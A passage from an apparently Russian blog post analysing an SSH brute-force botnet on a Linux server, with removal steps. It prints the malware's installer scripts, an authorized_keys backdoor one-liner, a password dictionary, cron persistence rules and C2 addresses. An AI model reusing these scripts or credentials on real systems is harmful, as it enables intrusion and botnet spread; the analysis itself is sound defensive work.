}<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<p>\u0411\u0435\u0433\u043b\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442, \u0447\u0442\u043e \u0431\u043e\u0442 \u043a\u043e\u043e\u0440\u0434\u0438\u043d\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0441 IRC \u0441\u0435\u0440\u0432\u0435\u0440\u0430 <code>45.9.148.125:443<\/code>. \u0424\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0439. \u041e\u043d \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c<\/p>\n<p>  <\/p>\n<ul>\n<li>\u041f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 Shell \u043a\u043e\u043c\u0430\u043d\u0434\u044b, \u0441\u0443\u0434\u044f \u043f\u043e \u043a\u043e\u0434\u0443, \u0432 \u0442.\u0447. \u0438 \u043d\u0430 Win32<\/li>\n<li>\u0411\u044b\u0441\u0442\u0440\u043e\u0435 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u0440\u0442\u043e\u0432 &quot;21&quot;,&quot;22&quot;,&quot;23&quot;,&quot;25&quot;,&quot;53&quot;,&quot;80&quot;,&quot;110&quot;,&quot;143&quot;,&quot;6665&quot; \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u0445\u043e\u0441\u0442\u0430<\/li>\n<li>\u0421\u043a\u0430\u0447\u0438\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e url \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u0436\u0435\u0440\u0442\u0432\u044b<\/li>\n<li>\u0421\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0434\u0438\u0430\u043f\u0430\u0437\u043e\u043d\u0430 \u043f\u043e\u0440\u0442\u043e\u0432 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u0445\u043e\u0441\u0442\u0430<\/li>\n<li>UDP \u0444\u043b\u0443\u0434 \u0441 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0439 \u0441\u043a\u043e\u0440\u043e\u0441\u0442\u044c\u044e \u043d\u0430 \u0432\u044b\u0431\u0440\u0430\u043d\u043d\u044b\u0439 \u0445\u043e\u0441\u0442<\/li>\n<li>UDP \u0444\u043b\u0443\u0434 \u0441 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0439 \u0441\u043a\u043e\u0440\u043e\u0441\u0442\u044c\u044e \u043d\u0430 \u043f\u043e\u0434\u0441\u0435\u0442\u044c<\/li>\n<li>\u0421\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0435 \u043f\u043e TCP \u0441 \u0432\u044b\u0431\u0440\u0430\u043d\u043d\u044b\u043c \u0445\u043e\u0441\u0442\u043e\u043c<\/li>\n<li>\u0412\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u043c\u0431\u0438\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0444\u043b\u0443\u0434 igmp, udp, icmp, tcp \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u0434\u0438\u0430\u043f\u0430\u0437\u043e\u043d\u0443 \u043f\u043e\u0440\u0442\u043e\u0432 \u043d\u0430 \u0445\u043e\u0441\u0442\u0435<\/li>\n<\/ul>\n<p>  <\/p>\n<p>\u0412 \u0441\u043a\u0440\u0438\u043f\u0442\u0435 \u0442\u0430\u043a \u0436\u0435 \u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u044b \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 url: <code>http:\/\/www.minpop.com\/sk12pack\/idents.php<\/code> \u0438 <code>http:\/\/www.minpop.com\/sk12pack\/names.php<\/code>, \u043e\u0434\u043d\u0430\u043a\u043e, \u043e\u043d\u0438 \u0432\u044b\u0433\u043b\u044f\u0434\u044f\u0442 \u043d\u0435\u0440\u0430\u0431\u043e\u0447\u0438\u043c\u0438.<\/p>\n<p>  <\/p>\n<p>\u042d\u0442\u043e\u0433\u043e \u0430\u0440\u0441\u0435\u043d\u0430\u043b\u0430 \u0445\u0432\u0430\u0442\u0430\u0435\u0442, \u0447\u0442\u043e\u0431\u044b \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0433 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0441\u0438\u0441\u0442\u0435\u043c\u043e\u0439 \u0438 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b.<\/p>\n<p>  <\/p>\n<h3 id=\"skaner-brutforser\">\u0421\u043a\u0430\u043d\u0435\u0440-\u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441\u0435\u0440<\/h3>\n<p>  <\/p>\n<p>\u0421\u0430\u043c\u0430\u044f \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u043c\u0430\u043b\u0432\u0430\u0440\u0438. \u0411\u0443\u0434\u0443\u0447\u0438 \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u043c, \u0441\u043a\u0430\u043d\u0435\u0440 \u0432\u0438\u0434\u0435\u043d \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043a\u0430\u043a \u043f\u0440\u043e\u0446\u0435\u0441\u0441 <code>tsm<\/code> \u0438 \u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u0434\u043e\u0431\u0440\u0430\u0442\u044c ssh \u043f\u0430\u0440\u043e\u043b\u0438 \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 N \u0445\u043e\u0441\u0442\u0430\u0445 \u0438 \u0437\u0430\u0440\u0430\u0437\u0438\u0442\u044c \u0438\u0445. \u0412 \u043c\u043e\u0435\u043c \u0441\u043b\u0443\u0447\u0430\u0435, \u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b \u0444\u0430\u0439\u043b \u0441 70\u043a ip \u0430\u0434\u0440\u0435\u0441\u0430\u043c\u0438 \u0438 \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u0441\u043b\u043e\u0432\u0430\u0440\u044c \u0442\u0438\u043f\u043e\u0432\u044b\u0445 \u043f\u0430\u0440\u043e\u043b\u0435\u0439. \u0421\u043a\u0430\u043d\u0435\u0440 \u0438\u043c\u0435\u0435\u0442 \u0441\u0432\u043e\u0438 \u0440\u0430\u043d\u0442\u0430\u0439\u043c \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 (std, openssh, dns, resolv,pthread) \u043f\u043e\u0434 \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u044b <code>x32<\/code>, <code>x64<\/code>, <code>armv7<\/code>. \u0417\u0430 \u0441\u0447\u0435\u0442 \u044d\u0442\u043e\u0433\u043e, \u0437\u0430\u0440\u0430\u0437\u0430 \u043c\u043e\u0436\u0435\u0442 \u0432\u0435\u0435\u0440\u043d\u043e \u0437\u0430\u0440\u0430\u0436\u0430\u0442\u044c \u0431\u043e\u043b\u044c\u0448\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0436\u0435\u0440\u0442\u0432 \u043d\u0430 \u0440\u0430\u0437\u043d\u044b\u0445 \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u0430\u0445. \u041a\u0430\u0436\u0434\u0430\u044f \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u0430\u044f \u043c\u0430\u0448\u0438\u043d\u0430 \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u0447\u0430\u0441\u0442\u044c\u044e \u0431\u043e\u0442\u043d\u0435\u0442\u0430 \u0438 \u043d\u0430\u0440\u0430\u0449\u0438\u0432\u0430\u0435\u0442 \u043c\u043e\u0449\u043d\u043e\u0441\u0442\u044c \u0441\u0435\u0442\u0438.<\/p>\n<p>  <\/p>\n<p>\u0412\u043d\u0443\u0442\u0440\u0438 \u0438\u0441\u043f\u043e\u043b\u043d\u0438\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u044f \u043d\u0430\u0448\u0435\u043b \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0441\u0442\u0440\u043e\u043a\u0438<\/p>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">help<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"plaintext\">----------------------&gt;Faster than light&lt;----------------------------- ---------------------&gt;use only for testing&lt;--------------------------- Use: scan [OPTIONS] [[USER PASS]] FILE] [IPs\/IPs Port FILE]         -t [NUMTHREADS]: Change the number of threads used. Default is %d         -m [MODE]: Change the way the scan works. Default is %d         -f [FINAL SCAN]: Does a final scan on found servers. Default is %d         Use -f 1 for A.B class \/16. Default is 2 for A.B.C \/24         -i [IP SCAN]: use -i 0 to scan ip class A.B. Default is %d         if you use -i 0 then use .\/scan -p 22 -i 0 p 192.168 as agrument for ip file         -m 0 for non selective scanning         -P 0 leave default password unchanged. Changes password by default.         -s [TIMEOUT]: Change the timeout. Default is %ld         -S [2ndTIMEOUT]: Change the 2nd timeout. Default is %ld         -p [PORT]: Specify another port to connect to. 0 for multiport         -c [REMOTE-COMMAND]: Command to execute on connect. Use ; or &amp;&amp; with commands Use: .\/scan -t 202 -s 5 -S 5 p ip -c &quot;uname&quot; Use: .\/scan -t 202 -s 5 -S 5 -i 0 -p 22 p 192.168 The example above will scan 192.168 port 22 and brute force the IP list. Use: .\/scan -t 202 -s 5 -S 5 -p 0 p ip - for &quot;ip port&quot; file Use: .\/scan -t 202 -s 5 -S 5 -p 23 -m 0 p ip - for other protocols When using -m 1 (default value) the scan will only target full linux machines or windows machines with openssh installed. Routers, busyboxes honeypots and other limited linux devices will be skipped from the output. Use -m 0 for non-selective scanning (can be used for all type of ssh devices) this includes busyboxes, routers, honeypots and other devices with limited commands. ================================================================ ==========================================================================<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0417\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0432 base64 \u0441\u043a\u0440\u0438\u043f\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0449\u0438\u043a\u0430, \u0432\u0430\u0440\u0438\u0430\u043d\u0442 1<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"plaintext\">#!\/bin\/bash cd \/tmp  rm -rf .ssh rm -rf .mountfs rm -rf .X13-unix rm -rf .X17-unix rm -rf .X19-unix mkdir .X19-unix cd .X19-unix mv \/var\/tmp\/dota3.tar.gz dota3.tar.gz tar xf dota3.tar.gz sleep 3s &amp;&amp; cd .rsync; cat \/tmp\/.X19-unix\/.rsync\/initall | bash 2&gt;1&amp; sleep 45s &amp;&amp; pkill -9 run &amp;&amp; pkill -9 go &amp;&amp; pkill -9 tsm exit 0<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0417\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0432 base64 \u0441\u043a\u0440\u0438\u043f\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0449\u0438\u043a\u0430, \u0441 \u0437\u0430\u043f\u0443\u0441\u043a\u043e\u043c \u0441\u043a\u0430\u043d\u0435\u0440\u0430<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"plaintext\">#!\/bin\/bash cd \/tmp  rm -rf .ssh rm -rf .mountfs rm -rf .X13-unix rm -rf .X17-unix rm -rf .X19-unix mkdir .X19-unix cd .X19-unix mv \/var\/tmp\/dota3.tar.gz dota3.tar.gz tar xf dota3.tar.gz sleep 3s &amp;&amp; cd \/tmp\/.X19-unix\/.rsync\/c nohup \/tmp\/.X19-unix\/.rsync\/c\/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 \/tmp\/up.txt 192.168 &gt;&gt; \/dev\/null 2&gt;1&amp; sleep 8m &amp;&amp; nohup \/tmp\/.X19-unix\/.rsync\/c\/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 \/tmp\/up.txt 172.16 &gt;&gt; \/dev\/null 2&gt;1&amp; sleep 20m &amp;&amp; cd ..; \/tmp\/.X19-unix\/.rsync\/initall 2&gt;1&amp; exit 0<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">C\u043a\u0440\u0438\u043f\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0449\u0438\u043a\u0430 ssh \u043a\u043b\u044e\u0447\u0430<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"plaintext\">cd ~ &amp;&amp; rm -rf .ssh &amp;&amp; mkdir .ssh &amp;&amp; echo &quot;ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2\/9p7+vD0EpZ3Tz\/+0kX34uAx1RV\/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr&quot;&gt;&gt;.ssh\/authorized_keys &amp;&amp; chmod -R go= ~\/.ssh &amp;&amp; cd ~<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<p>\u0422\u0430\u043a \u0436\u0435 \u0435\u0441\u0442\u044c \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u0435 ip \u0430\u0434\u0440\u0435\u0441\u043e\u0432 <code>45.9.148.129<\/code> \u0438 <code>45.9.148.125<\/code>, \u043d\u0430\u0445\u043e\u0434\u044f\u0449\u0438\u0445\u0441\u044f \u0432 \u041d\u0438\u0434\u0435\u0440\u043b\u0430\u043d\u0434\u0430\u0445.<\/p>\n<p>  <\/p>\n<p>\u0421\u043b\u043e\u0432\u0430\u0440\u044c \u0434\u043b\u044f \u043f\u043e\u0434\u0431\u043e\u0440\u0430 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 \u2014 \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439, \u0445\u0440\u0430\u043d\u0438\u0442\u0441\u044f \u0432 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u043c \u0444\u0430\u0439\u043b\u0435.<\/p>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043b\u043e\u0432\u0430\u0440\u044c \u043f\u043e\u0434\u0431\u043e\u0440\u0430 \u043f\u0430\u0440\u043e\u043b\u0435\u0439<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"plaintext\">jabez jabez admin smiles root campbell jawad jawad test $$$$$$$$ root wangjianjun sdtdserver sdtdserver idea idea foundry 123456 citlalli citlalli root sensor123 info info333 kaasen kaasen root Million2017 jakayla jakayla edineide edineide wikre wikre guest edges games nobody123 vcsa hhhhhhh root sq root root@1234567890 ftpuser password! web nobody0000 root jyy mysql chelu charming 123456 web web1111 pscsec pscsec root michell louhellen louhellen xgridagent xgridagent alligator alligator root subrosa denny password ftp 1220 rival rival root 9i8u7y root general1 smenes smenes root password@1234567890 support testing root 123asdfghjkl smmsp 12330 root fladvert picher picher backup farrell hung root2root guest shinobu sacre sacre123<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<p>\u041f\u043e \u0441\u043a\u0440\u0438\u043f\u0442\u0430\u043c \u0432\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u0441\u0430\u043c \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432 \u043c\u0430\u043b\u0432\u0430\u0440\u0438 \u043b\u0435\u0436\u0438\u0442 \u0432 \u0430\u0440\u0445\u0438\u0432\u0435 <code>dota3.tar.gz<\/code>, \u043e\u0434\u043d\u0430\u043a\u043e \u043c\u043d\u0435 \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u043f\u043e\u043d\u044f\u0442\u044c \u043a\u0430\u043a\u0438\u043c\u043e \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u043e\u043d \u043f\u043e\u043f\u0430\u0434\u0430\u0435\u0442 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443. \u042f\u0432\u043d\u043e\u0439 \u0434\u0438\u0440\u0435\u043a\u0442\u0438\u0432\u044b \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043d\u0438\u044f \u0444\u0430\u0439\u043b\u0430 \u043d\u0435\u0442. \u0412\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u043e\u043d \u043f\u043e\u0434\u043a\u043b\u0430\u0434\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u0431\u044d\u043a\u0434\u043e\u0440. \u0415\u0441\u043b\u0438 \u0443 \u0412\u0430\u0441 \u0435\u0441\u0442\u044c \u0438\u0434\u0435\u0438 \u043d\u0430 \u044d\u0442\u043e\u0442 \u0441\u0447\u0435\u0442, \u043f\u0438\u0448\u0438\u0442\u0435 \u0432 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u044b.<\/p>\n<p>  <\/p>\n<h3 id=\"lancher\">\u041b\u0430\u043d\u0447\u0435\u0440<\/h3>\n<p>  <\/p>\n<p>\u0412 \u043c\u043e\u043c\u0435\u043d\u0442 \u0437\u0430\u043f\u0443\u0441\u043a\u0430, \u043c\u0430\u043b\u0432\u0430\u0440\u044c \u043f\u0440\u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u0441\u0435\u0431\u044f \u0432 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0443 cron \u0434\u043b\u044f \u0442\u0435\u043a\u0443\u0449\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. \u0412 \u043f\u0430\u043f\u043a\u0435 <code>\/var\/spool\/cron\/crontabs\/&lt;username&gt;<\/code> \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 \u0444\u0430\u0439\u043b \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0433\u043e \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u044f<\/p>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u041f\u0440\u0430\u0432\u0438\u043b\u0430 cron<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"plaintext\">0 0 *\/3 * * \/dev\/shm\/.lwp\/.rsync\/a\/upd&gt;\/dev\/null 2&gt;&amp;1 5 8 * * 0 \/dev\/shm\/.lwp\/.rsync\/b\/sync&gt;\/dev\/null 2&gt;&amp;1 @reboot \/dev\/shm\/.lwp\/.rsync\/b\/sync&gt;\/dev\/null 2&gt;&amp;1 0 0 *\/3 * * \/dev\/shm\/.lwp\/.rsync\/c\/aptitude&gt;\/dev\/null 2&gt;&amp;1<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<p>\u0432 \u043d\u0435\u043c \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442\u0441\u044f \u0432\u0441\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b, \u043e\u0442\u043d\u043e\u0441\u044f\u0449\u0438\u0435\u0441\u044f \u043a \u0437\u043b\u043e\u0432\u0440\u0435\u0434\u0443.<\/p>\n<p>  <\/p>\n<h2 id=\"pora-pokonchit-s-etim-bezobraziem\">\u041f\u043e\u0440\u0430 \u043f\u043e\u043a\u043e\u043d\u0447\u0438\u0442\u044c \u0441 \u044d\u0442\u0438\u043c \u0431\u0435\u0437\u043e\u0431\u0440\u0430\u0437\u0438\u0435\u043c!<\/h2>\n<p>  <\/p>\n<p>\u041c\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u043e \u0442\u043e\u043c, \u043a\u0430\u043a \u0432\u0435\u0434\u0435\u0442 \u0441\u0435\u0431\u044f \u0437\u043b\u043e\u0432\u0440\u0435\u0434. \u0422\u0435\u043f\u0435\u0440\u044c \u043c\u043e\u0436\u043d\u043e \u0432\u044b\u0441\u0442\u0440\u043e\u0438\u0442\u044c \u0441\u0442\u0440\u0430\u0442\u0435\u0433\u0438\u044e \u0434\u043b\u044f \u043e\u0447\u0438\u0441\u0442\u043a\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043e\u0442 \u043d\u0435\u0433\u043e.<\/p>\n<p>  <\/p>\n<p>\u0423\u0431\u0438\u0440\u0430\u0435\u043c cron \u0437\u0430\u0434\u0430\u0447\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">rm -rf \/var\/spool\/cron\/crontabs\/&lt;username&gt;<\/code><\/pre>\n<p>  <\/p>\n<p>\u0423\u0431\u0438\u0432\u0430\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b \u044e\u0437\u0435\u0440\u0430<\/p>\n<p>  <\/p>\n<pre><code class=\"bash\">pkill -u &lt;username&gt;<\/code><\/pre>\n<p>  <\/p>\n<p>\u0423\u0431\u0438\u0440\u0430\u0435\u043c \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0439 ssh \u043a\u043b\u044e\u0447<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">rm \/home\/&lt;username&gt;\/.ssh\/authorized_keys<\/code><\/pre>\n<p>  <\/p>\n<p>\u0423\u0434\u0430\u043b\u044f\u0435\u043c \u0441\u0430\u043c \u0437\u043b\u043e\u0432\u0440\u0435\u0434<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">rm -rf \/dev\/shm\/.lwp<\/code><\/pre>\n<p>  <\/p>\n<p>\u042f \u0442\u0430\u043a \u0436\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e \u043f\u043e\u0432\u0442\u043e\u0440\u0438\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0432\u044b\u0448\u0435 \u0434\u0432\u0430\u0436\u0434\u044b \u0438 \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u044e\u0437\u0435\u0440\u0430 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u0439 \u043f\u0430\u043f\u043a\u043e\u0439. \u041f\u0440\u0438 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438, \u0435\u0433\u043e \u043c\u043e\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u0441\u043e\u0437\u0434\u0430\u0442\u044c \u0437\u0430\u043d\u043e\u0432\u043e.<\/p>\n<p>  <\/p>\n<h2 id=\"chto-delat-s-zablokirovannym-ip-adresom\">\u0427\u0442\u043e \u0434\u0435\u043b\u0430\u0442\u044c \u0441 \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c IP \u0430\u0434\u0440\u0435\u0441\u043e\u043c?<\/h2>\n<p>  <\/p>\n<p>\u042f \u043f\u043e\u0437\u0432\u043e\u043d\u0438\u043b \u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0443 \u0438 \u0441\u043e\u043e\u0431\u0449\u0438\u043b \u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0435, \u043c\u0435\u043d\u044f \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0432\u044b\u0441\u043b\u0443\u0448\u0430\u043b\u0438 \u0438 \u043f\u043e\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u043e\u0432\u0430\u043b\u0438 \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u043e\u0431 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0435 \u0432 \u0441\u0430\u043f\u043f\u043e\u0440\u0442, \u043f\u0440\u0438\u043b\u043e\u0436\u0438\u0432 \u0432\u0441\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0435 \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u044b. \u041d\u0438\u043a\u0430\u043a\u0438\u0445 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439 \u043f\u043e \u0440\u0430\u0437\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0435 IP \u043c\u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c. \u041c\u043d\u0435 \u043f\u043e\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u043e\u0432\u0430\u043b\u0438 \u043f\u043e\u043c\u0435\u043d\u044f\u0442\u044c \u0435\u0433\u043e \u043d\u0430 \u043d\u043e\u0432\u044b\u0439 \u0447\u0435\u0440\u0435\u0437 \u041b\u041a, \u0430 \u0441\u0442\u0430\u0440\u044b\u0439 \u0430\u0434\u0440\u0435\u0441 \u0432\u0435\u0440\u043d\u0443\u043b\u0441\u044f \u0432 \u043f\u0443\u043b \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0434\u043b\u044f \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439. \u041c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043a\u0442\u043e-\u0442\u043e \u0441 \u0445\u0430\u0431\u0440\u0430 \u043f\u043e\u0434\u0441\u043a\u0430\u0436\u0435\u0442 \u043a\u0430\u043a \u0441\u043d\u044f\u0442\u044c \u0441 \u0430\u0434\u0440\u0435\u0441\u0430 \u0447\u0435\u0440\u043d\u0443\u044e \u043c\u0435\u0442\u043a\u0443?<\/p>\n<p>  <\/p>\n<h2 id=\"kakaya-sistema-uyazvima-dlya-podobnoy-ataki\">\u041a\u0430\u043a\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u0430 \u0434\u043b\u044f \u043f\u043e\u0434\u043e\u0431\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0438<\/h2>\n<p>  <\/p>\n<p>\u0412 \u0441\u0443\u0449\u043d\u043e\u0441\u0442\u0438, \u043b\u044e\u0431\u0430\u044f Linux \u0441\u0438\u0441\u0442\u0435\u043c\u0430, \u0443 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043e\u0442\u043a\u0440\u044b\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043a ssh \u0438 \u0435\u0441\u0442\u044c \u043c\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439. \u0412 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438, \u044d\u0442\u043e \u043a\u0430\u0441\u0430\u0435\u0442\u0441\u044f \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0435\u0440\u043e\u0432 \u0438 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432. \u0418\u0437\u0432\u0435\u0441\u0442\u0435\u043d \u0441\u043b\u0443\u0447\u0430\u0439 <a href=\"https:\/\/www.microsoft.com\/security\/blog\/2019\/05\/23\/uncovering-linux-based-cyberattack-using-azure-security-center\/\">\u041c\u0430\u0441\u0441\u043e\u0432\u043e\u0433\u043e 